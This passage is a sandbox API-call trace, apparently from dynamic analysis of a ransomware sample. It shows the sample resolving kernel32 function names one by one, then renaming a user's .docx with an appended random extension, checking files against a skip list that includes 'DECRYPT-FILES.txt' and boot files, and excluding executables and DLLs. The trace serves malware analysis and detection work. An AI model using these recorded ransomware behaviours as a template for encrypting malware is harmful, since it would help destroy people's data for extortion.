lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.629] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.629] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.629] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.629] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.629] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.629] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.629] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.629] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.629] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.629] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.629] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.629] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.629] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.629] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.629] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.629] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.629] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.629] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.629] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.629] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.629] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.629] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.630] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.630] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.630] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.630] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.630] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.630] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.630] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.630] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.630] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.630] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.630] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.630] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.630] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.630] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.630] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.630] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.630] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.630] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.630] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.630] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.630] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.630] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.630] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.630] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.630] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.630] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.630] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.630] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.630] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.630] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.630] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.630] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.630] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.630] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.630] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.630] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.630] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.631] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.631] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.631] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.631] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.631] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.631] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.631] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.631] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.631] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.631] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.631] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.631] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.631] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.631] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.631] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.631] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.631] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.631] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.631] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.631] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.631] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.631] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.631] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.631] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.631] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.631] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.631] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.631] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.631] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.631] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.631] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.631] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.631] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.631] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.631] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.631] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.632] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.632] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.632] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.632] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.632] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.632] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.632] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.632] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.632] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.632] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.632] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.632] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.632] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.632] lstrlenA (lpString="DELETEATOM") returned 10 [0084.632] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.632] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.632] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.632] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.632] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.632] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.632] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.632] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.632] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.632] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.632] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.632] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.632] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.632] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.632] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.632] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.632] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.632] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.632] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.632] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.632] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.632] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.632] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.633] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.633] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.633] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.633] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.633] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.633] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.633] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.633] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.633] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.633] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.633] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.633] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.633] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.633] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.633] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.633] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.633] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.633] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.633] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.633] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.633] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.633] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.633] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.633] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.633] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.633] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.633] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.633] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.633] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.633] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.633] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.633] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.633] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.633] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.633] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.633] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.633] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.634] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.634] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.634] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.634] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.634] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.634] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.634] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.634] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.634] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.634] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.634] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.634] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.634] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.634] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.634] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.634] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.634] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.634] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.634] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.634] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.634] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.634] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.634] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\Z1Ci0uT2mheh7iNWJ6Ft.docx") returned 100 [0084.634] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\Z1Ci0uT2mheh7iNWJ6Ft.docx.jwuBYt") returned 107 [0084.634] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\Z1Ci0uT2mheh7iNWJ6Ft.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\z1ci0ut2mheh7inwj6ft.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\Z1Ci0uT2mheh7iNWJ6Ft.docx.jwuBYt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\z1ci0ut2mheh7inwj6ft.docx.jwubyt"), dwFlags=0x0) returned 1 [0084.635] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.635] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.635] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.636] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdef6a930, ftCreationTime.dwHighDateTime=0x1d4c5fa, ftLastAccessTime.dwLowDateTime=0x2dc82740, ftLastAccessTime.dwHighDateTime=0x1d4d222, ftLastWriteTime.dwLowDateTime=0x2dc82740, ftLastWriteTime.dwHighDateTime=0x1d4d222, nFileSizeHigh=0x0, nFileSizeLow=0x17dfd, dwReserved0=0x0, dwReserved1=0x0, cFileName="Z1Ci0uT2mheh7iNWJ6Ft.docx", cAlternateFileName="Z1CI0U~1.DOC")) returned 0 [0084.636] FindClose (in: hFindFile=0x5f8b18 | out: hFindFile=0x5f8b18) returned 1 [0084.636] CloseHandle (hObject=0x428) returned 1 [0084.636] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae797500, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xae797500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae797500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0084.636] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0084.636] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0084.636] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0084.636] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0084.636] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0084.636] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0084.636] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0084.636] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0084.636] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0084.636] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0084.636] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.636] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0084.636] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0084.636] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0084.636] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0084.636] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned 57 [0084.636] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.636] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" [0084.636] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\jkbimi8.tmp" [0084.636] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.637] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0084.637] CloseHandle (hObject=0x0) returned 0 [0084.637] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.637] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60887270, ftCreationTime.dwHighDateTime=0x1d4cac5, ftLastAccessTime.dwLowDateTime=0xaaabad40, ftLastAccessTime.dwHighDateTime=0x1d4cb10, ftLastWriteTime.dwLowDateTime=0xaaabad40, ftLastWriteTime.dwHighDateTime=0x1d4cb10, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L4RiddZbkkAp", cAlternateFileName="L4RIDD~1")) returned 1 [0084.637] lstrcmpW (lpString1="L4RiddZbkkAp", lpString2=".") returned 1 [0084.637] 